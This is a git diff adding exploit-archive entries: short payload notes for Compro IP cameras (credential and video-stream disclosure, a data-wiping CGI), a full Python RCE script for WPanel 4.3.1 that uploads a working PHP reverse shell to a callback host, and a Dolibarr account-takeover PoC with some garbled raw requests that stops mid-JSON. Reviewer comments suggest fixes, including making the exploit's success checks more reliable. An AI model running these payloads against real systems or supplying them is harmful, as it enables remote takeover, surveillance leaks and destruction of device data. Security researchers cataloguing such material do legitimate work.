diff --git a/exploits/hardware/webapps/50250.txt b/exploits/hardware/webapps/50250.txt
new file mode 100644
index 000000000..1bcad1748
--- /dev/null
+++ b/exploits/hardware/webapps/50250.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40378
+
+There is a backdoor prefabricated in the device in this path. Accessing the
+file through the browser after logging in will cause the device to delete
+all data (including the data of the camera itself).
+
+Payload:Visit this page after logging in
+/cgi-bin/support/killps.cgi
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50251.txt b/exploits/hardware/webapps/50251.txt
new file mode 100644
index 000000000..bd1d8246c
--- /dev/null
+++ b/exploits/hardware/webapps/50251.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40379
+
+Some devices have unauthorized access to rstp, which can lead to the
+leakage of surveillance video stream information.
+
+Payload:rstp://.../medias2
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50252.txt b/exploits/hardware/webapps/50252.txt
new file mode 100644
index 000000000..08dde234b
--- /dev/null
+++ b/exploits/hardware/webapps/50252.txt
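Review bot: The title labels this a Denial-of-Service, but the body describes an authenticated request that deletes all data on the device, and the header does not mark the authentication requirement the way 50251 marks `(Unauthenticated)`; aligning the title with the body, e.g. `# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Authenticated Data Deletion / Denial-of-Service (DoS)`, would make the listing read correctly. The word "backdoor" is also stronger than what the entry shows — a reachable reset or maintenance CGI would explain the same behaviour — so it should either be hedged or tied to the part of the referenced write-up that supports it. The only statement of effect is "delete all data", so a sentence on whether the device comes back in a factory state or stays unusable would help anyone assessing impact.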
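Review bot: `rstp` is a typo for RTSP in both the prose sentence and the Payload line; the title spells it correctly, so the Payload line should read `Payload:rtsp://.../medias2`. "Some devices" does not say which of the four models under `# Version:` were actually observed serving the stream without authentication, which is the one fact a defender needs to scope exposure, so the tested model(s) should be named in the header. The `...` presumably stands in for the device address; saying so explicitly would avoid confusion with the path.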
@@ -0,0 +1,18 @@
+# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40380
+
+There are unauthorized access vulnerabilities, which can lead to the
+disclosure of device administrator usernames and passwords or rstp
+usernames and passwords.
+
+Payload:
+
+/cgi-bin/cameralist/cameralist.cgi
+/cgi-bin/cameralist/setcamera.cgi?id=*
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50253.txt b/exploits/hardware/webapps/50253.txt
new file mode 100644
index 000000000..9de522738
--- /dev/null
+++ b/exploits/hardware/webapps/50253.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40381
+
+Has an unauthorized access vulnerability, which can lead to unauthorized
+access to the camera video page.
+
+Payload:
+
+/cgi-bin/view/index_MJpeg.cgi
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50254.txt b/exploits/hardware/webapps/50254.txt
new file mode 100644
index 000000000..e9749bfa3
--- /dev/null
+++ b/exploits/hardware/webapps/50254.txt
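Review bot: The same `rstp` → RTSP typo as in 50251 appears in the second prose line, which should read `disclosure of device administrator usernames and passwords or RTSP`. The title carries no `(Unauthenticated)` marker although the body says the endpoints are reachable without authorization, which is inconsistent with 50251 and makes the severity easy to misread in a listing; `# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure (Unauthenticated)` would match the sibling entry. The `id=*` in the second Payload line reads like a literal wildcard but is presumably a placeholder for a camera id; a short remark saying which would remove the ambiguity.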
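Review bot: The quoted endpoint in the Exploit Title line has a stray leading space, `' index_MJpeg.cgi'`, which breaks exact-match searching on the title; the line should read `# Exploit Title: Compro Technology IP Camera - 'index_MJpeg.cgi' Stream Disclosure`, and the same stray space is in 50254's title (`' mjpegStreamer.cgi'`). The first body sentence also lacks a subject ("Has an unauthorized access vulnerability…"); "The device has an unauthorized access vulnerability…" reads cleanly. Whether this entry, 50252 and 50254 are one missing authentication check on the CGI tree or separate defects is not stated — I can only infer it from the shared paths — and a sentence on that would help a vendor triage them together.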
@@ -0,0 +1,16 @@
+# Exploit Title: Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure
+# Date: 2021-09-30
+# Exploit Author: icekam,xiao13,Rainbow,tfsec
+# Software Link: http://www.comprotech.com.hk/
+# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
+# CVE : CVE-2021-40382
+
+There is an unauthorized access vulnerability, which can lead to
+unauthorized access to camera video screenshots.
+
+Payload:
+
+/mjpegStreamer.cgi
+
+please refer to:
+https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50255.txt b/exploits/multiple/webapps/50255.txt
new file mode 100644
index 000000000..dd54d97dc
--- /dev/null
+++ b/exploits/multiple/webapps/50255.txt
@@ -0,0 +1,265 @@ +# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated) +# Date: 07/06/2021 +# Exploit Author: Sentinal920 +# Vendor Homepage: https://github.com/wpanel +# Software Link: https://github.com/wpanel/wpanel4-cms +# Version: 4.3.1 +# Tested on: Linux + +import requests +import random,string + + +# Change This +################################### +url = 'http://192.168.182.134:8080' +email = 'admin@localhost.com' +password = 'admin' +################################### + +# PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php +# Works on linux/windows/mac + +########################################################################### +# Make sure to change lhost and lport in the reverse shell below (Line 223) +########################################################################### + + +# Get_Cookies +r = requests.get(url) +r2 = requests.get(url,cookies=r.cookies) +cookie = r2.cookies['wpanel_csrf_cookie'] +name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9)) + +payload = ''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="wpanel_csrf_token" + +'''+cookie+''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="titulo" + +'''+name+''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="descricao" + +'''+name+''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="tags" + +tesad +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="userfile"; filename="php-reverse-shell.php" +Content-Type: application/x-php + + array('pipe', 'r'), // shell can read from STDIN + 1 => array('pipe', 'w'), // shell can write to STDOUT + 2 => array('pipe', 'w') // shell can write to STDERR + ); + private $options = array(); // 
proc_open() options + private $buffer = 1024; // read/write buffer size + private $clen = 0; // command length + private $error = false; // stream read/write error + public function __construct($addr, $port) { + $this->addr = $addr; + $this->port = $port; + } + private function detect() { + $detected = true; + if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS + $this->os = 'LINUX'; + $this->shell = '/bin/sh'; + } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) { + $this->os = 'WINDOWS'; + $this->shell = 'cmd.exe'; + $this->options['bypass_shell'] = true; // we do not want a shell within a shell + } else { + $detected = false; + echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n"; + } + return $detected; + } + private function daemonize() { + $exit = false; + if (!function_exists('pcntl_fork')) { + echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n"; + } else if (($pid = @pcntl_fork()) < 0) { + echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n"; + } else if ($pid > 0) { + $exit = true; + echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n"; + } else if (posix_setsid() < 0) { + // once daemonized you will actually no longer see the script's dump + echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n"; + } else { + echo "DAEMONIZE: Completed successfully!\n"; + } + return $exit; + } + private function settings() { + @error_reporting(0); + @set_time_limit(0); // do not impose the script execution time limit + @umask(0); // set the file/directory permissions - 666 for files and 777 for directories + } + private function dump($data) { + $data = str_replace('<', '<', $data); + $data = str_replace('>', '>', $data); + echo $data; + } + private function read($stream, $name, $buffer) { + if (($data = @fread($stream, $buffer)) === false) { // 
suppress an error when reading from a closed blocking stream + $this->error = true; // set global error flag + echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n"; + } + return $data; + } + private function write($stream, $name, $data) { + if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream + $this->error = true; // set global error flag + echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n"; + } + return $bytes; + } + // read/write method for non-blocking streams + private function rw($input, $output, $iname, $oname) { + while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { + if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length + $this->dump($data); // script's dump + } + } + // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) + // we must read the exact byte length from a stream and not a single byte more + private function brw($input, $output, $iname, $oname) { + $size = fstat($input)['size']; + if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { + // for some reason Windows OS pipes STDIN into STDOUT + // we do not like that + // we need to discard the data from the stream + while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { + $this->clen -= $bytes; + $size -= $bytes; + } + } + while ($size > 0 && ($bytes = $size >= $this->buffer ? 
$this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { + $size -= $bytes; + $this->dump($data); // script's dump + } + } + public function run() { + if ($this->detect() && !$this->daemonize()) { + $this->settings(); + + // ----- SOCKET BEGIN ----- + $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); + if (!$socket) { + echo "SOC_ERROR: {$errno}: {$errstr}\n"; + } else { + stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS + + // ----- SHELL BEGIN ----- + $process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options); + if (!$process) { + echo "PROC_ERROR: Cannot start the shell\n"; + } else { + foreach ($pipes as $pipe) { + stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS + } + + // ----- WORK BEGIN ----- + @fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . 
"\n"); + do { + if (feof($socket)) { // check for end-of-file on SOCKET + echo "SOC_ERROR: Shell connection has been terminated\n"; break; + } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running + echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams + } // use proc_get_status() instead + $streams = array( + 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR + 'write' => null, + 'except' => null + ); + $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS + if ($num_changed_streams === false) { + echo "STRM_ERROR: stream_select() failed\n"; break; + } else if ($num_changed_streams > 0) { + if ($this->os === 'LINUX') { + if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN + if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET + if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET + } else if ($this->os === 'WINDOWS') { + // order is important + if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN + if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET + if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET + } + } + } while (!$this->error); + // ------ WORK END ------ + + foreach ($pipes as $pipe) { + fclose($pipe); + } + proc_close($process); + } + // ------ SHELL END ------ + + fclose($socket); + } + 
// ------ SOCKET END ------ + + } + } +} +echo '
'; +// change the host address and/or port number as necessary +$sh = new Shell('192.168.182.136', 9000); +$sh->run(); +unset($sh); +// garbage collector requires PHP v5.3.0 or greater +// @gc_collect_cycles(); +echo ''; +?> + + +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="status" + +1 +-----------------------------45668787242378192391383974033-- + + +''' +data = 'wpanel_csrf_token='+cookie+'&email='+email+'&password='+password +headers = {'Content-Type': 'application/x-www-form-urlencoded'} +# Login_as_admin +r3 = requests.post(url+'/index.php/admin/login',cookies=r.cookies,headers=headers,data=data) + + +def exploit_gallery(): + + # Adding_Reverse_Shell + headers2 = {'Content-Type': 'multipart/form-data; boundary=---------------------------45668787242378192391383974033'} + r4 = requests.post(url + '/index.php/admin/galleries/add',cookies=r.cookies,headers=headers2,data=payload) + + print('') + print('Shell Uploaded as: '+name) + print('') + print('Visit: '+url+'/index.php/admin/galleries') + print('OR') + print('Visit: '+url+'/index.php/galleries') + print('') + +exploit_gallery() + + +#def exploit_post(): +#def exloit_pages(): +#def dashboard_avatar_image(): \ No newline at end of file diff --git a/exploits/php/webapps/50248.txt b/exploits/php/webapps/50248.txt new file mode 100644 index 000000000..f422d58a0 --- /dev/null +++ b/exploits/php/webapps/50248.txt 
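Review bot: Neither the login response `r3` nor the upload response `r4` is checked, so the script prints `Shell Uploaded as: …` even when authentication or the upload fails; at minimum add `r3.raise_for_status()` after the login POST and `r4.raise_for_status()` after the upload, and because a rejected login may well come back as a 200 with the form re-rendered (I cannot confirm that from the hunk), the session should be verified before the gallery request is built. The file ends with commented-out stubs (`#def exploit_post():` and two more) that should be deleted or collapsed into one `# TODO` line. The header has no description of the underlying weakness — from the request shown it is an unrestricted file upload of `userfile` in the admin gallery form that accepts a `.php` filename — and unlike the other entries in this commit it carries no `# CVE :` or reference line, so a `# Description:` line plus a reference (or an explicit "no CVE assigned") would help defenders map it. The banner comment pointing at "Line 223" for the host/port cannot be verified from the collapsed hunk and will go stale on the next edit; naming the `new Shell(...)` line instead is more robust.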
@@ -0,0 +1,192 @@ +# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation +# Date: April 8, 2021 +# Exploit Author: Vishwaraj101 +# Vendor Homepage: https://www.dolibarr.org/ +# Affected Version: <= 14.0.1 +# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d + +*Summary:* +Using the below chain of issues attacker can compromise any dolibarr +user account including the admin. + +*Poc:* + + 1. Visit https://example.com/api/index.php/login?login=demo&password=demo + try to login with a test user with 0 permissons or less permissions. + 2. We will receive an api token in return. + 3. Next we need to fetch the user id of the user whose account we want + to own. + + + +*First we need to fetch the user id of the admin user using the below api.* + +*Request1:* + +GET /api/index.php/users/login/admin HTTP/1.1Host: +preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept: +application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close + +*This will return the user details using the username. 
Now update the +victim user account via below api (include the json body received from the +previous request1 and replace the email id from below json to the attacker +controlled email)* + + +*Request2:*PUT /api/index.php/users/*12* HTTP/1.1 + +Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; +WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 +Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept: +application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, +deflateDOLAPIKEY: test1337Origin: +https://preview2.dolibarr.orgConnection: closeReferer: +http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length: +3221 +{ + "id": "12", + "statut": "1", + "employee": "1", + "civility_code": null, + "gender": "woman", + "birth": 495583200, + "email": "*attacker@example.com